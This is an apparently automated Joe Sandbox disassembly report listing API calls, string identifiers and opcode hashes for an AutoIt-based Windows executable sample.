                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: GlobalMemorySleepStatus
                                • String ID: @
                                • API String ID: 2783356886-2766056989
                                • Opcode ID: 14c4d16d1860504e0b46a0620ed62a0ab39f53b1d99b051e90925e449e881224
                                • Instruction ID: 4d32e2c7185fe93d98df9c93d5fb47524ecc178865814578580ced6bc0d99b06
                                • Opcode Fuzzy Hash: 14c4d16d1860504e0b46a0620ed62a0ab39f53b1d99b051e90925e449e881224
                                • Instruction Fuzzy Hash: A8513771408744ABE320AF24DC85BABBBECFB98354F41884DF1C8811A5EB71956DC762
                                APIs
                                  • Part of subcall function 00C6417D: __fread_nolock.LIBCMT ref: 00C6419B
                                • _wcscmp.LIBCMT ref: 00CACF49
                                • _wcscmp.LIBCMT ref: 00CACF5C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscmp$__fread_nolock
                                • String ID: FILE
                                • API String ID: 4029003684-3121273764
                                • Opcode ID: 0a18f31b58a84d84b00cd6c076737b8401f90459ba01a7464047550f8bc4e20c
                                • Instruction ID: aa3f0adc0635a49b5d1bdfcd695ed8433da12dfd3403f6eb2cbca473f956b6f5
                                • Opcode Fuzzy Hash: 0a18f31b58a84d84b00cd6c076737b8401f90459ba01a7464047550f8bc4e20c
                                • Instruction Fuzzy Hash: 8E41C632A0421ABEDF20DBA4CC81FEF7BB9AF4A714F000469F511E7191DB759A449B60
                                APIs
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00CCA668
                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CCA67D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: '
                                • API String ID: 3850602802-1997036262
                                • Opcode ID: 11fb406de42de5fcfe0f6ec3c628fd632c12fd06f2f6a8bbfbd7d9959d56322e
                                • Instruction ID: f07abd08ac7b31c58f4df586a89a0e9508bf54175ef1a29014a20253ddc30d9f
                                • Opcode Fuzzy Hash: 11fb406de42de5fcfe0f6ec3c628fd632c12fd06f2f6a8bbfbd7d9959d56322e
                                • Instruction Fuzzy Hash: FB410675A00309AFDB14CFA9C984FDABBB5FB09304F14446AE915EB381D770A942CFA1
                                APIs
                                • _memset.LIBCMT ref: 00CB57E7
                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00CB581D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CrackInternet_memset
                                • String ID: |
                                • API String ID: 1413715105-2343686810
                                • Opcode ID: b77f19365a92362e3d7ee2d2e1cb0a416603e3e12dbf8de8e55bfc9d18f40e7b
                                • Instruction ID: 980839693723fd40b1cdeabb5df93d983489ef3487dad9e4972e57a11d5e770f
                                • Opcode Fuzzy Hash: b77f19365a92362e3d7ee2d2e1cb0a416603e3e12dbf8de8e55bfc9d18f40e7b
                                • Instruction Fuzzy Hash: D4311B71800119EBCF11AFA1DC95EEE7FB9FF18310F204119F815A61A2DB319A4ADB60
                                APIs
                                • DestroyWindow.USER32(?,?,?,?), ref: 00CC961B
                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CC9657
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$DestroyMove
                                • String ID: static
                                • API String ID: 2139405536-2160076837
                                • Opcode ID: 0667f2f809c59c4b77680ff42cfe91b394824fe2e99b7cda806014c7835efc1f
                                • Instruction ID: d0f1d973a1e0fe1d4a2465b9a258de7739c0e2a12ee90d2f0156e3fabce1e766
                                • Opcode Fuzzy Hash: 0667f2f809c59c4b77680ff42cfe91b394824fe2e99b7cda806014c7835efc1f
                                • Instruction Fuzzy Hash: 02318931500604AEEB109F68DC84FFB77A9FF58764F00861DF8AAC7190CA31AD81DB60
                                APIs
                                • _memset.LIBCMT ref: 00CA5BE4
                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CA5C1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: InfoItemMenu_memset
                                • String ID: 0
                                • API String ID: 2223754486-4108050209
                                • Opcode ID: 75c32aa0baad6fc23d14a9ba4e82132ca50f6313a45e06414d9a7f5ab5fd3857
                                • Instruction ID: 08c3b856f6e321564d7b618c60dbe51d68d0cd2a47d006eb6da14b0ec5771914
                                • Opcode Fuzzy Hash: 75c32aa0baad6fc23d14a9ba4e82132ca50f6313a45e06414d9a7f5ab5fd3857
                                • Instruction Fuzzy Hash: 4A31A731500706EFDB249F99D985BADBBF4EF0B36CF188019E991961A8D7709B44DF10
                                APIs
                                • __snwprintf.LIBCMT ref: 00CB6BDD
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                Strings
                                Similarity
                                • API ID: __snwprintf_memmove
                                • String ID: , $$AUTOITCALLVARIABLE%d
                                • API String ID: 3506404897-2584243854
                                • Opcode ID: 4e95dbbd7a184a3925105e51e3613e2a0ccbfa315e7ab5c58184a77c6cb3ed4b
                                • Instruction ID: 9b7e9538f7469217cca82bfffb4dbd4f0c960daae47f673642cb2abccb7f437c
                                • Opcode Fuzzy Hash: 4e95dbbd7a184a3925105e51e3613e2a0ccbfa315e7ab5c58184a77c6cb3ed4b
                                • Instruction Fuzzy Hash: E9215C31600219BFCF14EFA4D8C2AEE7BB5AF49700F104459F545A7181DB74EA46EBA1
                                APIs
                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CC9269
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CC9274
                                Strings
                                Similarity
                                • API ID: MessageSend
                                • String ID: Combobox
                                • API String ID: 3850602802-2096851135
                                • Opcode ID: 823362925140d07dceae5a62cb510ff488666e57b7259ca6a12de47688d6769e
                                • Instruction ID: a649e863623068fc27f2f2fef5db9520e75d9443df0b04fa3d6d3afde05403a5
                                • Opcode Fuzzy Hash: 823362925140d07dceae5a62cb510ff488666e57b7259ca6a12de47688d6769e
                                • Instruction Fuzzy Hash: 6011B271300209BFEF218F54DCC5FEB376AEB893A4F104128F96997290D631DD519BA0
                                APIs
                                  • Part of subcall function 00C7C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C7C657
                                  • Part of subcall function 00C7C619: GetStockObject.GDI32(00000011), ref: 00C7C66B
                                  • Part of subcall function 00C7C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C7C675
                                • GetWindowRect.USER32(00000000,?), ref: 00CC9775
                                • GetSysColor.USER32(00000012), ref: 00CC978F
                                Strings
                                Similarity
                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                • String ID: static
                                • API String ID: 1983116058-2160076837
                                • Opcode ID: e67945877656ab17674a47ebef915bad789763ddb79732319fd046f715cb3f4e
                                • Instruction ID: 1b85ac3df89dca71dbd6361221975d3c2a2628f453b7dba15da4899d2f06c00f
                                • Opcode Fuzzy Hash: e67945877656ab17674a47ebef915bad789763ddb79732319fd046f715cb3f4e
                                • Instruction Fuzzy Hash: 5D113776520209AFDB04DFB8DC89EEE7BB8EB08354F005529F956E3241E735E851DB60
                                APIs
                                • GetWindowTextLengthW.USER32(00000000), ref: 00CC94A6
                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CC94B5
                                Strings
                                Similarity
                                • API ID: LengthMessageSendTextWindow
                                • String ID: edit
                                • API String ID: 2978978980-2167791130
                                • Opcode ID: 5abb3dea1492e120ee73f3f1f034232ba6a3c050252593f2afd5ebde6eb8ca4f
                                • Instruction ID: 06cc20bbb1c50058bb5a61bdb418ba1dd660e11163db5cec9f566ec80d1b5c18
                                • Opcode Fuzzy Hash: 5abb3dea1492e120ee73f3f1f034232ba6a3c050252593f2afd5ebde6eb8ca4f
                                • Instruction Fuzzy Hash: 4C113D71500208AFEB148EA4DC89FBB376AEB15374F504728F975971D0C675DC52AB60
                                APIs
                                • _memset.LIBCMT ref: 00CA5CF3
                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00CA5D12
                                Strings
                                Similarity
                                • API ID: InfoItemMenu_memset
                                • String ID: 0
                                • API String ID: 2223754486-4108050209
                                • Opcode ID: 2cc0f0f174cb6119173cac728ad98fabd9da42e1058fbe4f4f0c4fd6dcde4572
                                • Instruction ID: 55a73893fc3b2f12ac1554f4da0db046b2ccb24feda3d09e13dd93da254a1964
                                • Opcode Fuzzy Hash: 2cc0f0f174cb6119173cac728ad98fabd9da42e1058fbe4f4f0c4fd6dcde4572
                                • Instruction Fuzzy Hash: 8511B672D0162AABDB20DB58DD48B9D7BF99B1B35CF188011ED51EB290D3709E05C791
                                APIs
                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CB544C
                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CB5475
                                Strings
                                Similarity
                                • API ID: Internet$OpenOption
                                • String ID: <local>
                                • API String ID: 942729171-4266983199
                                • Opcode ID: a1b2a20ad3828f58ff9bbf29aad8b9b670bc731238e331427f65d9ff7a50b045
                                • Instruction ID: faee1b9374f5f11b49a78f43deb4a24cc2532b8750f6066607656a766d5db1e2
                                • Opcode Fuzzy Hash: a1b2a20ad3828f58ff9bbf29aad8b9b670bc731238e331427f65d9ff7a50b045
                                • Instruction Fuzzy Hash: FF119E70141A21BADB258F529885FEBBAA8EF12752F10822AF65557040E6B06AC0DAB0
                                APIs
                                • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00CBACF5
                                • htons.WSOCK32(00000000,?,00000000), ref: 00CBAD32
                                Strings
                                Similarity
                                • API ID: htonsinet_addr
                                • String ID: 255.255.255.255
                                • API String ID: 3832099526-2422070025
                                • Opcode ID: c21e8329345714f82e4794de92a30c845f3f62af99051f46f20ebcee50784a0f
                                • Instruction ID: 9f1340b4cd031b061eb39a9e0572451c8aabd52b8b3e8cc7b5f31334daf82210
                                • Opcode Fuzzy Hash: c21e8329345714f82e4794de92a30c845f3f62af99051f46f20ebcee50784a0f
                                • Instruction Fuzzy Hash: 1001D235200305ABCB109FB4D886FEEB364EF09724F20851AF9169B2D1DA71E910C755
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C9C5E5
                                Strings
                                Similarity
                                • API ID: MessageSend_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 1456604079-1403004172
                                • Opcode ID: 6ea0147e4a73ed97557002e0a514531e6225e59a3369b1622ca3d19846d73994
                                • Instruction ID: 4e988e983951537b2a5b1abbafc66ed195fcbcb1e457ecd08cfbff386b3caf45
                                • Opcode Fuzzy Hash: 6ea0147e4a73ed97557002e0a514531e6225e59a3369b1622ca3d19846d73994
                                • Instruction Fuzzy Hash: 5001B171641218ABCB18FBA4CCD69FE73A9AF4A310B140A19F473A72D1DE316909B750
                                APIs
                                Strings
                                Similarity
                                • API ID: __fread_nolock_memmove
                                • String ID: EA06
                                • API String ID: 1988441806-3962188686
                                • Opcode ID: 8c4e2de651daab61eb21cbb980abdebfdc1aab0f17370b52c43b6b07ba905850
                                • Instruction ID: 19539f868276af19d58f4449bee97c5464f72945ff90c2b1e2ed83a975bb5f25
                                • Opcode Fuzzy Hash: 8c4e2de651daab61eb21cbb980abdebfdc1aab0f17370b52c43b6b07ba905850
                                • Instruction Fuzzy Hash: EA01F5729002187EDB28D7A8C856EFE7BF89B05715F00416AF193D2181E4B4A7089B60
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C9C4E1
                                Strings
                                Similarity
                                • API ID: MessageSend_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 1456604079-1403004172
                                • Opcode ID: 2d4812c0698edc8dfb7c2abe033927fac09016e412f405ed1b923043334cc07c
                                • Instruction ID: 8403de2171e2bdacb671e8f60637666033eb42dfc6daca3151fdd63a9db32b5a
                                • Opcode Fuzzy Hash: 2d4812c0698edc8dfb7c2abe033927fac09016e412f405ed1b923043334cc07c
                                • Instruction Fuzzy Hash: 0B018B71641108BBCB14EBA4C9E6AFF73A89F19300F240129B543E32D2EA549E09A6A1
                                APIs
                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00C6352A
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                • _wcscat.LIBCMT ref: 00CD66C0
                                Strings
                                Similarity
                                • API ID: FullNamePath_memmove_wcscat
                                • String ID: `T
                                • API String ID: 257928180-1867313790
                                • Opcode ID: 983a32298ce583804c223c41551d336e6223916852f330d1e5ec13b4550de60a
                                • Instruction ID: fafdc708aa2e04ee99bf3afa9601fd9824b44a69c8064c6f974f94e4104066bb
                                • Opcode Fuzzy Hash: 983a32298ce583804c223c41551d336e6223916852f330d1e5ec13b4550de60a
                                • Instruction Fuzzy Hash: A601C47590411C9ACB20FBA0D8C5ADD73F9AF24348F0045A5AA16D3190EA309B869B61
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C9C562
                                Strings
                                Similarity
                                • API ID: MessageSend_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 1456604079-1403004172
                                • Opcode ID: 609f1206de2eea3843351341732c67170c3e5415d1ba4edfac0dadba316af524
                                • Instruction ID: f5d345c3fa519180c9619a8c022dd74825f3001fd0369188fe4c07ad6158a80b
                                • Opcode Fuzzy Hash: 609f1206de2eea3843351341732c67170c3e5415d1ba4edfac0dadba316af524
                                • Instruction Fuzzy Hash: 3801AD71A41108BBCB14FBA4C9D6EFF73AC9F19701F240115B403E3192DA65AF09B2B1
                                APIs
                                Strings
                                Similarity
                                • API ID: ClassName_wcscmp
                                • String ID: #32770
                                • API String ID: 2292705959-463685578
                                • Opcode ID: 96803afa67d3e44b52589df180bf0d7d9c76e8dd48c569cf0051441deb7d5a9a
                                • Instruction ID: 09ec8a87f3d63e2e9a14b440c186194685759e36da943520da87e58e82a5940c
                                • Opcode Fuzzy Hash: 96803afa67d3e44b52589df180bf0d7d9c76e8dd48c569cf0051441deb7d5a9a
                                • Instruction Fuzzy Hash: CEE0D83360032967D720EBA6AC4AFDBFBACEB51764F000026F924E3141DA70A64587E4
                                APIs
                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C9B36B
                                  • Part of subcall function 00C82011: _doexit.LIBCMT ref: 00C8201B
                                Strings
                                Similarity
                                • API ID: Message_doexit
                                • String ID: AutoIt$Error allocating memory.
                                • API String ID: 1993061046-4017498283
                                • Opcode ID: 6ede149d211ec456cc6d53f85588ca1b75c9ed5e471aef216b7d1d5e44a3ff45
                                • Instruction ID: 3a3f337d3cec810506da803ec7d53f2727f1434a9a62b295e26f3620d2e7ae2e
                                • Opcode Fuzzy Hash: 6ede149d211ec456cc6d53f85588ca1b75c9ed5e471aef216b7d1d5e44a3ff45
                                • Instruction Fuzzy Hash: CED05B3138835833D65536987C4FFD9768C4F05B56F100415BF09591D28ED295D062ED
                                APIs
                                • GetSystemDirectoryW.KERNEL32(?), ref: 00CDBAB8
                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00CDBCAB
                                Strings
                                Similarity
                                • API ID: DirectoryFreeLibrarySystem
                                • String ID: WIN_XPe
                                • API String ID: 510247158-3257408948
                                • Opcode ID: 0a2abe56d99ae73343c049e3858492614093345afbca244c320562a89327ee24
                                • Instruction ID: 98dc5b54db48192c4315328622fe6f3ecbe48d8a1e05db49d4d3da59d294783c
                                • Opcode Fuzzy Hash: 0a2abe56d99ae73343c049e3858492614093345afbca244c320562a89327ee24
                                • Instruction Fuzzy Hash: 4AE0C970C0414DEFCB15DBA9C885AEDB7B8BB08300F558486E626B6250C7719E45EF25
                                APIs
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CC84DF
                                • PostMessageW.USER32(00000000), ref: 00CC84E6
                                  • Part of subcall function 00CA8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CA83CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: FindMessagePostSleepWindow
                                • String ID: Shell_TrayWnd
                                • API String ID: 529655941-2988720461
                                • Opcode ID: 9467b231fa0971c5eb1f0e9261665608fe2b99bd59170e76ac6f4708d95a7390
                                • Instruction ID: fceedbcc39ffbab10489d55c7001f25bf846bd9a8cd8e328a6c7727b86906b7e
                                • Opcode Fuzzy Hash: 9467b231fa0971c5eb1f0e9261665608fe2b99bd59170e76ac6f4708d95a7390
                                • Instruction Fuzzy Hash: FCD012723853547FEB65A770AC8FFDB6658AB19B51F040D29B34BAE1D0CDE0B804C664
                                APIs
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CC849F
                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CC84B2
                                  • Part of subcall function 00CA8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CA83CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: FindMessagePostSleepWindow
                                • String ID: Shell_TrayWnd
                                • API String ID: 529655941-2988720461
                                • Opcode ID: e5fefb8d22b68abb5616fa89a5ac19b5d4ca8b81d164232f0c75e1b7e2387ac0
                                • Instruction ID: c90f78e91d06a4f629e94ecf96d3033ef154742e9e253effd4b435068f52a4b7
                                • Opcode Fuzzy Hash: e5fefb8d22b68abb5616fa89a5ac19b5d4ca8b81d164232f0c75e1b7e2387ac0
                                • Instruction Fuzzy Hash: F7D01272385354BFEB64A770AC8FFDB6A58AB14B51F040D29B34BAE1D0CDE0B804C660